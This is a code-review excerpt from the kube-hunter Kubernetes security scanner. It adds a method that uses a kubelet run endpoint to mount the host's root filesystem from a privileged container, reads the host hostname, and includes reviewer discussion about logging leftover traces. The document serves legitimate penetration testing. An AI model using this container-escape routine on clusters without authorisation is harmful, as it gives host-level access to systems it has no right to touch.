kube_hunter/modules/hunting/kubelet.py

```diff
@@ -434,6 +452,453 @@ def is_kubesystem_pod(pod):
+                        # Potential valid scenario: root=LABEL=example
+                        root_value_type = split[1] + "="
+                        root_value = split[2]
+
+                        return root_value, root_value_type
+                    else:
+                        root_value_type = ""
+                        root_value = split[1]
+
+                        return root_value, root_value_type
+
+        return None, None
+
+    def process_exposed_existing_privileged_container(
+        self, run_request_url, seconds_to_wait_for_os_command, directory_to_create=None
+    ):
+        if directory_to_create is None:
+            directory_to_create = "/kube-hunter_" + str(uuid.uuid1())
+
+        # /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started.
+        command_line = FootholdViaSecureKubeletPort.cat_command(run_request_url, "/proc/cmdline")
+
+        if FootholdViaSecureKubeletPort.has_no_error_nor_exception(command_line):
+            if len(command_line.split(" ")) > 0:
+                root_value, root_value_type = self.get_root_values(command_line)
+
+                # Move forward only when the "root" variable value was actually defined.
+                if root_value:
+                    if root_value_type:
+                        file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value)
+                    else:
+                        file_system_or_partition = root_value
+
+                    if FootholdViaSecureKubeletPort.has_no_error_nor_exception(file_system_or_partition):
+                        directory_created = self.mkdir_command(run_request_url, directory_to_create)
+
+                        if FootholdViaSecureKubeletPort.has_no_error_nor_exception(directory_created):
+                            directory_created = directory_to_create
+
+                            mounted_file_system_or_partition = self.mount_command(
+                                run_request_url, file_system_or_partition, directory_created
+                            )
+
+                            if FootholdViaSecureKubeletPort.has_no_error_nor_exception(
+                                mounted_file_system_or_partition
+                            ):
+                                host_name = FootholdViaSecureKubeletPort.cat_command(
+                                    run_request_url, "{}/etc/hostname".format(directory_created)
+                                )
+
+                                if FootholdViaSecureKubeletPort.has_no_error_nor_exception(host_name):
+                                    return {
+                                        "result": True,
+                                        "file_system_or_partition": file_system_or_partition,
+                                        "directory_created": directory_created,
+                                    }
+
+                                self.umount_command(
```

Comment:
Here, we should **most definitely write an ERROR log**, which tells the user if we could not unmount the host directory, telling him on which container, pod and namespace this happened.

Reply:
Probably best to write the log inside the umount_command function, so it will show each time

Reply:
Hi @danielsagi,

How do you want to handle the ERROR log?

Reply:
calling logger.error would be fine, just mention all of the pod's metadata in there, so the user would know where to find the trails kube-hunter left behind.

Reply:
Hi @danielsagi,

I've introduced warnings accordingly.

I think we should explore normalising the handling of logging, errors, and exceptions across the repository before considering creating files.